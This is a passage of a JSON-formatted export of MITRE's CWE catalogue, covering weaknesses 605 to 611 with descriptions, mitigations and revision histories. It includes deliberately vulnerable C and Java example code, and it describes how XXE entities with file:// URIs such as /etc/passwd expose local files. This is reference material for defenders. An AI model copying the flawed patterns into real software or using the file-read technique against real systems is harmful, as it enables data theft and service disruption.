Common_Consequences, Maintenance_Notes, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Relationships"}],"Previous_Entry_Name":{"#text":"Client-Side Authentication","attr":{"@_Date":"2008-04-11"}}}},"605":{"attr":{"@_ID":"605","@_Name":"Multiple Binds to the Same Port","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"When multiple sockets are allowed to bind to the same port, other services on that port may be stolen or spoofed.","Extended_Description":"On most systems, a combination of setting the SO_REUSEADDR socket option, and a call to bind() allows any process to bind to a port to which a previous process has bound with INADDR_ANY. This allows a user to bind to the specific address of a server bound to INADDR_ANY on an unprivileged port, and steal its UDP packets/TCP connection.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"675","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"666","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":"Read Application Data","Note":"Packets from a variety of network services may be stolen or the services spoofed."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Policy","Description":"Restrict server socket address to known local addresses."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code binds a server socket to port 21, allowing the server to listen for traffic on that port.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void bind_socket(void) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int server_sockfd;int server_len;struct sockaddr_in server_address;unlink(\\"server_socket\\");server_sockfd = socket(AF_INET, SOCK_STREAM, 0);server_address.sin_family = AF_INET;server_address.sin_port = 21;server_address.sin_addr.s_addr = htonl(INADDR_ANY);server_len = sizeof(struct sockaddr_in);bind(server_sockfd, (struct sockaddr *) &amp;s1, server_len);","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":"/*unlink the socket if already bound to avoid an error when bind() is called*/"}}}},"Body_Text":"This code may result in two servers binding a socket to same port, thus receiving each other\'s traffic. This could be used by an attacker to steal packets meant for another process, such as a secure FTP server."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP32","Entry_Name":"Multiple binds to the same port"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Enabling_Factors_for_Exploitation, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Description, Enabling_Factors_for_Exploitation, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"}],"Previous_Entry_Name":{"#text":"Multiple Binds to Same Port","attr":{"@_Date":"2008-04-11"}}}},"606":{"attr":{"@_ID":"606","@_Name":"Unchecked Input for Loop Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly check inputs that are used for loop conditions, potentially leading to a denial of service or other consequences because of excessive looping.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"834","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Do not use user-controlled data for loop conditions."},{"Phase":"Implementation","Description":"Perform input validation."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void iterate(int n){}void iterateFoo(){}","xhtml:div":[{"#text":"int i;for (i = 0; i &lt; n; i++){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"foo();","attr":{"@_style":"margin-left:10px;"}}},{"#text":"unsigned int num;scanf(\\"%u\\",&amp;num);iterate(num);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":["",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-91"},"Intro_Text":"In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessageFromSocket(int socket) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int success;char buffer[BUFFER_SIZE];char message[MESSAGE_SIZE];if (getMessage(socket, buffer, BUFFER_SIZE) &gt; 0) {}return success;","xhtml:br":["","","","","","","","",""],"xhtml:i":["// get message from socket and store into buffer","//Ignoring possibliity that buffer &gt; BUFFER_SIZE"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ExMessage *msg = recastBuffer(buffer);int index;for (index = 0; index &lt; msg-&gt;msgLength; index++) {}message[index] = \'\\\\0\';success = processMessage(message);","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// place contents of the buffer into message structure","// copy message body into string for processing","// process message"],"xhtml:div":{"#text":"message[index] = msg-&gt;msgBody[index];","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Body_Text":"However, the message length variable from the structure is used as the condition for ending the for loop without validating that the message length variable accurately reflects the length of the message body (CWE-606). This can result in a buffer over-read (CWE-125) by reading from memory beyond the bounds of the buffer if the message length variable indicates a length that is longer than the size of a message body (CWE-130)."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-606"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Looping Constructs&#34;, Page 327"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-606"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"607":{"attr":{"@_ID":"607","@_Name":"Public Static Final Field References Mutable Object","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A public or protected static final field references a mutable object, which allows the object to be changed by malicious code, or accidentally from another package.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"471","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Protect mutable objects by making them private. Restrict access to the getter and setter as well."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Here, an array (which is inherently mutable) is labeled public static final.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"public static final String[] USER_ROLES;"}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"608":{"attr":{"@_ID":"608","@_Name":"Struts: Non-private Field in ActionForm Class","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An ActionForm class contains a field that has not been declared private, which can be accessed without using a setter or getter.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":["Modify Application Data","Read Application Data"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Make all fields private. Use getter to get the value of the field. Setter should be used only by the framework; setting an action form field from other actions is bad practice and should be avoided."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for a online business site. The user will enter registration data and through the Struts framework the RegistrationForm bean will maintain the user data.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// variables for registration formpublic String name;public String email;...public RegistrationForm() {}public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...}...","xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// private variables for registration formprivate String name;private String email;...public RegistrationForm() {}public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...}","xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}},{"#text":"// getter and setter methods for private variables...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}],"Body_Text":"However, within the RegistrationForm the member variables for the registration form input data are declared public not private. All member variables within a Struts framework ActionForm class must be declared private to prevent the member variables from being modified without using the getter and setter methods. The following example shows the member variables being declared private and getter and setter methods declared for accessing the member variables."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"609":{"attr":{"@_ID":"609","@_Name":"Double-Checked Locking","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program uses double-checked locking to access a resource without the overhead of explicit synchronization, but the locking is insufficient.","Extended_Description":"Double-checked locking refers to the situation where a programmer checks to see if a resource has been initialized, grabs a lock, checks again to see if the resource has been initialized, and then performs the initialization if it has not occurred yet. This should not be done, as is not guaranteed to work in all languages and on all architectures. In summary, other threads may not be operating inside the synchronous block and are not guaranteed to see the operations execute in the same order as they would appear inside the synchronous block.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"367","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"While double-checked locking can be achieved in some languages, it is inherently flawed in Java before 1.5, and cannot be achieved without compromising platform independence. Before Java 1.5, only use of the synchronized keyword is known to work. Beginning in Java 1.5, use of the \\"volatile\\" keyword allows double-checked locking to work successfully, although there is some debate as to whether it achieves sufficient performance gains. See references."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-70"},"Intro_Text":"It may seem that the following bit of code achieves thread safety while avoiding unnecessary synchronization...","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"if (helper == null) {}return helper;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"synchronized (this) {}","xhtml:div":{"#text":"if (helper == null) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"helper = new Helper();","attr":{"@_style":"margin-left:10px;"}}}}},"xhtml:br":""}},{"attr":{"@_Nature":"bad"},"xhtml:div":"helper = new Helper();"}],"Body_Text":["The programmer wants to guarantee that only one Helper() object is ever allocated, but does not want to pay the cost of synchronization every time this code is called.","Suppose that helper is not initialized. Then, thread A sees that helper==null and enters the synchronized block and begins to execute:","If a second thread, thread B, takes over in the middle of this call and helper has not finished running the constructor, then thread B may make calls on helper while its fields hold incorrect values."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"LCK10-J","Entry_Name":"Do not use incorrect forms of the double-checked locking idiom"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-490"}},{"attr":{"@_External_Reference_ID":"REF-491"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 13, &#34;Threading Vulnerabilities&#34;, Page 815"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Context_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Double Checked Locking","attr":{"@_Date":"2008-04-11"}}}},"610":{"attr":{"@_ID":"610","@_Name":"Externally Controlled Reference to a Resource in Another Sphere","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"219"}}},"Notes":{"Note":[{"#text":"This is a general class of weakness, but most research is focused on more specialized cases, such as path traversal (CWE-22) and symlink following (CWE-61). A symbolic link has a name; in general, it appears like any other file in the file system. However, the link includes a reference to another file, often in another directory - perhaps in another sphere of control. Many common library functions that accept filenames will \\"follow\\" a symbolic link and use the link\'s target instead.","attr":{"@_Type":"Relationship"}},{"#text":"The relationship between CWE-99 and CWE-610 needs further investigation and clarification. They might be duplicates. CWE-99 \\"Resource Injection,\\" as originally defined in Seven Pernicious Kingdoms taxonomy, emphasizes the \\"identifier used to access a system resource\\" such as a file name or port number, yet it explicitly states that the \\"resource injection\\" term does not apply to \\"path manipulation,\\" which effectively identifies the path at which a resource can be found and could be considered to be one aspect of a resource identifier. Also, CWE-610 effectively covers any type of resource, whether that resource is at the system layer, the application layer, or the code layer.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Externally Controlled Reference to an Internal Resource","attr":{"@_Date":"2008-04-11"}}}},"611":{"attr":{"@_ID":"611","@_Name":"Improper Restriction of XML External Entity Reference","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.","Extended_Description":{"xhtml:p":["XML documents optionally contain a Document Type Definition (DTD), which, among other features, enables the definition of XML entities. It is possible to define an entity by providing a substitution string in the form of a URI. The XML parser can access the contents of this URI and embed these contents back into the XML document for further processing.","By submitting an XML file that defines an external entity with a file:// URI, an attacker can cause the processing application to read the contents of a local file. For example, a URI such as \\"file:///c:/winnt/win.ini\\" designates (in Windows) the file C:\\\\Winnt\\\\win.ini, or file:///etc/passwd designates the password file in Unix-based systems. Using URIs with other schemes such as http://, the attacker can force the application to make outgoing requests to servers that the attacker cannot reach directly, which can be used to bypass firewall restrictions or hide the source of attacks such as port scanning.","Once the content of the URI is read, it is fed back into the application that is processing the XML. This application may echo back the data (e.g. in an error message), thereby exposing the file contents."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"441","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"XML","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"XXE","Description":"XXE is an acronym used for the term \\"XML eXternal Entities\\""}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"If the attacker is able to include a crafted DTD and a default entity resolver is enabled, the attacker may be able to access arbitrary files on the system."},{"Scope":"Integrity","Impact":"Bypass Protection Mechanism","Note":"The DTD may include arbitrary HTTP requests that the server may execute. This could lead to other attacks leveraging the server\'s trust relationship with other entities."},{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"The software could consume excessive CPU cycles or memory using a URI that points to a large file, or a device that always returns data such as /dev/random. Alternately, the URI could reference a file that contains many nested or recursive entity references to further slow down parsing."}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Implementation","System Configuration"],"Description":"Many XML parsers and validators can be configured to disable external entity expansion."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1306","Description":"A browser control can allow remote attackers to determine the existence of files via Javascript containing XML 